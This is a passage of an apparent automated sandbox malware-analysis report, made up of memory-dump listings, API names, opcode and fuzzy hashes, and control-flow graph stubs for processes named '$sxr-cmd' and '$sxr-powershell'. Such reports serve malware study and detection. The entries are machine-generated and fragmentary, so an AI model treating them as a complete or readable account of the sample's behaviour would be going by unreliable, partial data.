                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Stringtry_get_function
                                                                                                            • String ID: LCMapStringEx
                                                                                                            • API String ID: 2588686239-3893581201
                                                                                                            • Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction ID: cf1b401c50bb954322ce52191aa9d4d6face2bd4a6695e9a50dad3f9eb3ae4b5
                                                                                                            • Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction Fuzzy Hash: 9D112736608B90D6EB60CB06F444B9AB7A1F7D9B94F944126FE8E83B19CF38C4448B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                            • Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction ID: cbd19f21f2eb2a836f97a28860ed2d3f289efaa0650a263032afe03aec52d7de
                                                                                                            • Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction Fuzzy Hash: 43116D32214B54D2EF108B25F444699B7E6FBE8B98F584260EF8D077A8DF39C455C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 3$3
                                                                                                            • API String ID: 0-2538865259
                                                                                                            • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                            • Instruction ID: a1d4ae5e424480fe777dde601b0f98f35c6c1d68da56bcc8342f330b37f177df
                                                                                                            • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                            • Instruction Fuzzy Hash: 660112B190E982CAF794AB65A8C5674EA60BB58331FE40635C40F215A1CE3E64ADC671
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpintry_get_function
• String ID: InitializeCriticalSectionEx
• API String ID: 539475747-3084827643
• Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction ID: 889d794c6211ed9e91ca4ed19899eff68e14e220b7ae6a272dc37c55464e69d9
• Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction Fuzzy Hash: B2F0B436205F64E1FF065B41B458ED46272FBD8B94FC440A1BA1A03B58CF38C489C710
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315
• Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction ID: 1edb938eee0abe502b56b26512bf067a7cad471a07002fa073cbbe5c95b2e994
• Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction Fuzzy Hash: B3E03072201E14F2FE055B55B85CED86233B7E8B89FD84066FA1A06259DF3CC45DC610
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction ID: 7ab4990203ef10dc7ef61f51961389030b82607b9129b8a1602feefaaaf1014c
• Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction Fuzzy Hash: 2E416D72A09A4286EB95AB10E480179F7A4FB49B60F948434D65E23754DF3DE45CCB70
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction ID: b2214b8c1a40b8ee7f2e91d4f4a8e7b35eb6d8a13a1a2d280d35a8888d4009e0
• Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction Fuzzy Hash: 78219432205F94D5EF518F15E40869AF7E2FBD5B98F944010EF8D47724EB78C4468740
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction ID: 1ebe8c27ea250151e8dbcc7db2826ab0eb6e723f27adfb04884c8d90f34e9017
• Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction Fuzzy Hash: 6BE06571602A18EAFB048F62D81878976E2FBD9F15F89C014CA0907354DF7D84998740
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 1.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 466
Total number of Limit Nodes: 6
16193 1f5fdc7f666 16191->16193 16192 1f5fdc7f8ef _handle_error 16192->16190 16193->16192 16194 1f5fdc7aeac 5 API calls 16193->16194 16195 1f5fdc7f6e3 16193->16195 16194->16195 16196 1f5fdc7f7e7 16195->16196 16213 1f5fdc7d760 16195->16213 16196->16192 16198 1f5fdc7b978 __free_lconv_mon 4 API calls 16196->16198 16198->16192 16199 1f5fdc7f78f 16199->16196 16200 1f5fdc7f7a4 16199->16200 16201 1f5fdc7f7f6 16199->16201 16200->16196 16204 1f5fdc7d760 3 API calls 16200->16204 16202 1f5fdc7f810 16201->16202 16203 1f5fdc7aeac 5 API calls 16201->16203 16202->16196 16205 1f5fdc7d760 3 API calls 16202->16205 16203->16202 16204->16196 16208 1f5fdc7f891 16205->16208 16206 1f5fdc7f8c6 16206->16196 16207 1f5fdc7b978 __free_lconv_mon 4 API calls 16206->16207 16207->16196 16208->16206 16219 1f5fdc7d120 16208->16219 16214 1f5fdc7d36c try_get_function 2 API calls 16213->16214 16215 1f5fdc7d79e 16214->16215 16216 1f5fdc7d7a3 16215->16216 16223 1f5fdc7d83c 16215->16223 16216->16199 16218 1f5fdc7d7ff LCMapStringW 16218->16216 16221 1f5fdc7d143 WideCharToMultiByte 16219->16221 16222 1f5fdc830b0 16221->16222 16224 1f5fdc7d36c try_get_function 2 API calls 16223->16224 16225 1f5fdc7d86a 16224->16225 16225->16218 16227 1f5fdc7abe1 16226->16227 16228 1f5fdc7abeb 16226->16228 16227->16228 16233 1f5fdc7ac06 16227->16233 16229 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16228->16229 16230 1f5fdc7abf2 16229->16230 16231 1f5fdc7b7c0 _invalid_parameter_noinfo 6 API calls 16230->16231 16232 1f5fdc7abfe 16231->16232 16232->15794 16233->16232 16234 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16233->16234 16234->16230 16236 1f5fdc7a738 16235->16236 16237 1f5fdc7a781 16235->16237 16236->15792 16238 1f5fdc7a7aa 16237->16238 16240 1f5fdc7b978 __free_lconv_mon 4 API calls 16237->16240 16239 1f5fdc7b978 __free_lconv_mon 4 API calls 16238->16239 16239->16236 16240->16237 16241 1f5fdc7db28 16242 1f5fdc7db38 16241->16242 16249 1f5fdc7fc4c 16242->16249 16244 1f5fdc7db41 16245 1f5fdc7db4f 16244->16245 
16257 1f5fdc7d92c GetStartupInfoW 16244->16257 16250 1f5fdc7fc94 16249->16250 16251 1f5fdc7fc6b 16249->16251 16255 1f5fdc7fc7c 16250->16255 16268 1f5fdc7fb54 16250->16268 16252 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16251->16252 16253 1f5fdc7fc70 16252->16253 16254 1f5fdc7b7c0 _invalid_parameter_noinfo 6 API calls 16253->16254 16254->16255 16255->16244 16258 1f5fdc7d9fb 16257->16258 16259 1f5fdc7d961 16257->16259 16263 1f5fdc7da1c 16258->16263 16259->16258 16260 1f5fdc7fc4c 7 API calls 16259->16260 16261 1f5fdc7d98a 16260->16261 16261->16258 16262 1f5fdc7d9b4 GetFileType 16261->16262 16262->16261 16265 1f5fdc7da3a 16263->16265 16264 1f5fdc7db0d 16264->16245 16265->16264 16266 1f5fdc7da95 GetStdHandle 16265->16266 16266->16265 16267 1f5fdc7daa8 GetFileType 16266->16267 16267->16265 16269 1f5fdc7b900 _set_errno_from_matherr 4 API calls 16268->16269 16274 1f5fdc7fb75 16269->16274 16270 1f5fdc7fbd7 16271 1f5fdc7b978 __free_lconv_mon 4 API calls 16270->16271 16272 1f5fdc7fbe1 16271->16272 16272->16250 16274->16270 16275 1f5fdc7d6fc 16274->16275 16276 1f5fdc7d36c try_get_function 2 API calls 16275->16276 16277 1f5fdc7d732 16276->16277 16278 1f5fdc7d747 InitializeCriticalSectionAndSpinCount 16277->16278 16279 1f5fdc7d73c 16277->16279 16278->16279 16279->16274 16280 1f5fdc7b900 16281 1f5fdc7b911 _set_errno_from_matherr 16280->16281 16282 1f5fdc7b962 16281->16282 16283 1f5fdc7b946 HeapAlloc 16281->16283 16284 1f5fdc7b8e0 _set_errno_from_matherr 3 API calls 16282->16284 16283->16281 16285 1f5fdc7b960 16283->16285 16284->16285 16286 1f5fdc429a0 16287 1f5fdc429ce 16286->16287 16288 1f5fdc42a2c VirtualAlloc 16287->16288 16289 1f5fdc42a50 16287->16289 16288->16289

Control-flow Graph
Memory Dump Source
• Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c31a05e9f541d9fa9a88d1c12d201bc0ad55dcb2b6afaa309031050444663c7d
• Instruction ID: 1735be3fce64e5d5c8d6f9126e9c017455f82200a68dc7a5a6f9f1b69b5d70c2
• Opcode Fuzzy Hash: c31a05e9f541d9fa9a88d1c12d201bc0ad55dcb2b6afaa309031050444663c7d
• Instruction Fuzzy Hash: 7DE1F722B1EAD55FE362976C98F64E57BE0DF5336470801BBCA84CB093ED5C68069362
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0
• Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
• Instruction ID: 5c0023575a1d0d4f6f4d3ec3a94e3c768e7433a94f1b2c972a9b70ea1a2decb6
• Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
• Instruction Fuzzy Hash: 7221A531B14F52C1E7609F12A4102AAA7A6F784BD0F485774DFAA63BD8DF38C8538300
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
• Instruction ID: e2a4adbf72c12da3b308920f20f41ba257a8e335aa4ec24e17f0939fbfd77b6f
• Opcode Fuzzy Hash: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
• Instruction Fuzzy Hash: A131C832A18F46D1EBA48F1595A02B92B52F345BB0F781BA9DB7A073E0CB35D463D341
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
Similarity
• API ID:
• String ID: _[_H
• API String ID: 0-2548533632
• Opcode ID: 49dde3b9c252ab50716133ea58e670a6def3b01bcd91e0f1580a2a702fefbc20
• Instruction ID: ad0159d3545f018f63c3e7a1b90527b8a0853f959b3d2c755717afeba1473a4f
• Opcode Fuzzy Hash: 49dde3b9c252ab50716133ea58e670a6def3b01bcd91e0f1580a2a702fefbc20
• Instruction Fuzzy Hash: 92C15E30A19A4D8FDF98DF5CC4A5AAD77E1FFA8704F144169D40DD7295CA78E881CB80
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
[Graph edge list omitted. Function at 1f5fdc429a0 (blocks 1f5fdc429a0-1f5fdc42c41): calls 1f5fdc40f34 four times, then VirtualAlloc, then 1f5fdc40d6c twice; the block following VirtualAlloc runs a loop over the allocated region before returning at 1f5fdc42c25.]
APIs
Memory Dump Source
• Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction ID: 29571c6e35b65c0117ab10a0097ba91f26ed8a843f89d92ec64be9dc23485e4c
• Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction Fuzzy Hash: 50610C32701A528BEF68CF1994617B9F3A2FB46B94F548435DB2A07785DE39E853C700
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
[Graph edge list omitted. Function at 7ffd3497052a (blocks 7ffd3497052a-7ffd3497059b): no API calls, two short conditional branches.]
Strings
Memory Dump Source
• Source File: 00000013.00000002.3442529177.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ffd34970000_$sxr-powershell.jbxd
Similarity
• API ID:
• String ID: H
• API String ID: 0-2852464175
• Opcode ID: a868ede8817eeb6ba8fff1e189fcba9496f81420b31ad0451030141959d36ead
• Instruction ID: 7c1807df5fe0910fc1707011ad18ca8eeefd30d889dd673304cf67aaa620f9b3
• Opcode Fuzzy Hash: a868ede8817eeb6ba8fff1e189fcba9496f81420b31ad0451030141959d36ead
• Instruction Fuzzy Hash: AF01F132F0E5854EE7A5DA2858A51B87BC1EF47304F4984BED64CC71C7DD2EAC0483A1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
[Graph edge list omitted. Function at 1f5fdc7b900 (blocks 1f5fdc7b900-1f5fdc7b974): HeapAlloc in a retry loop with 1f5fdc7e6f0 and 1f5fdc79dc4, falling through to 1f5fdc7b8e0 on failure.]
APIs
Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
• Instruction ID: 0acfe7b6cf2e418419896e7fac77b997b0b7ae8ba8cd35bdf28c1c540d7f70d0
• Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
• Instruction Fuzzy Hash: D1F01D75701A1BC1FFD56B65D4713F552A76B49B84F0C5CB08B3A963D1ED2CC5438211
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
[Graph edge list omitted. Function at 1f5fdc7b978 (blocks 1f5fdc7b978-1f5fdc7b9b4): HeapFree, calling 1f5fdc7b8e0 on failure.]
APIs
Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
• Instruction ID: 730aea16fe9de993e8ff3a363cd058195016ae1d6fd4a9fe88393c39e706d668
• Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
• Instruction Fuzzy Hash: 37D01271B11C47C2FF98A7E3E8757F201676F95B85F4858B0DF3985251EA1444938640
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 251 7ffd348a2b85-7ffd348a2be0 253 7ffd348a2bf7-7ffd348a2c06 251->253 254 7ffd348a2be2-7ffd348a2bf5 251->254 257 7ffd348a2c0d-7ffd348a2c23 253->257 254->253
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c8eb8843c4c5862470b4dc38798520c15323d5a746d06ee54a560d89635dbbf
                                                                                                            • Instruction ID: 0271b3ad7e50c666a008194bf5752dd12da9a24cdb4f26398d37c1f6bf5034b2
                                                                                                            • Opcode Fuzzy Hash: 0c8eb8843c4c5862470b4dc38798520c15323d5a746d06ee54a560d89635dbbf
                                                                                                            • Instruction Fuzzy Hash: 0311E91270EF894FDB96E67C94F43A53B90DFA621570800F7C549D72A2DD18DC078351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 259 7ffd348a33a5-7ffd348a33af 260 7ffd348a33f1-7ffd348a3420 259->260 261 7ffd348a33b1-7ffd348a33c5 259->261 264 7ffd348a3437-7ffd348a3463 260->264 265 7ffd348a3422-7ffd348a342c 260->265 266 7ffd348a342e-7ffd348a3435 265->266 266->264
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0e738db19cee2333fc284c30e206e715022da6faa4a3adbc625ad7bd6cf7db4f
                                                                                                            • Instruction ID: 74da37532352cbeea9d9f1660a99dc6042547fc3e74f3e8359d6f5d00c912e40
                                                                                                            • Opcode Fuzzy Hash: 0e738db19cee2333fc284c30e206e715022da6faa4a3adbc625ad7bd6cf7db4f
                                                                                                            • Instruction Fuzzy Hash: 5711D021B1EEC90FD796D77864B92A43BE0EF96200B4900FBC84CDB2A3CC58AC068351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 270 7ffd348a33ec-7ffd348a3420 272 7ffd348a3437-7ffd348a3463 270->272 273 7ffd348a3422-7ffd348a3435 270->273 273->272
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 65c128a2818c31a32dfddcbb3905b45c9b78113e969fb4e74556aee9218b2229
                                                                                                            • Instruction ID: de200f4eca8bf06790ff32871c6a856c468230a492039a5c4beec4890ff7ea32
                                                                                                            • Opcode Fuzzy Hash: 65c128a2818c31a32dfddcbb3905b45c9b78113e969fb4e74556aee9218b2229
                                                                                                            • Instruction Fuzzy Hash: 57012621B2EE8E0FDBD5E3AC50B827467D0EFA8315B4801BBC80DD3296CC68EC424380
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 278 7ffd34970293-7ffd349702c0 282 7ffd349702c8-7ffd349702d1 278->282 283 7ffd349702d3-7ffd349702e0 282->283 284 7ffd349702ea-7ffd349702f7 282->284 283->284 286 7ffd349702e2-7ffd349702e8 283->286 286->284
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3442529177.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd34970000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95d54f3add0f148de44f5628c7a69a191ea3baad5ff1da202b0074e51cf308e2
                                                                                                            • Instruction ID: 6617f09c602954040cafc3d0a384a80c9aec90f92da39788731912d8317f04a4
                                                                                                            • Opcode Fuzzy Hash: 95d54f3add0f148de44f5628c7a69a191ea3baad5ff1da202b0074e51cf308e2
                                                                                                            • Instruction Fuzzy Hash: 19F0D133F0E99A0FE7A592181CB91F86B81EF5A720B5900BED64DD7183DC09AC058395
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 288 7ffd348a3d68-7ffd348a3d6d 290 7ffd348a3d41-7ffd348a3d67 288->290
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                            • Instruction ID: 7ae214c7a5991379c5b9bade55974d791a1f4a12bfcd825d08fa7c30f78a185f
                                                                                                            • Opcode Fuzzy Hash: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                            • Instruction Fuzzy Hash: 45F0373275C6048FDB5CAA5CF4529B573D1E795320B10016EE48BC3696E927F8428685
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                            • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
